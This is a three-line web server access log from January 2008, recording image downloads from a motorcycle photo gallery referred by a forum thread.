68.43.230.137 - - [31/Jan/2008:17:00:55 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:56 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:56 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com" 6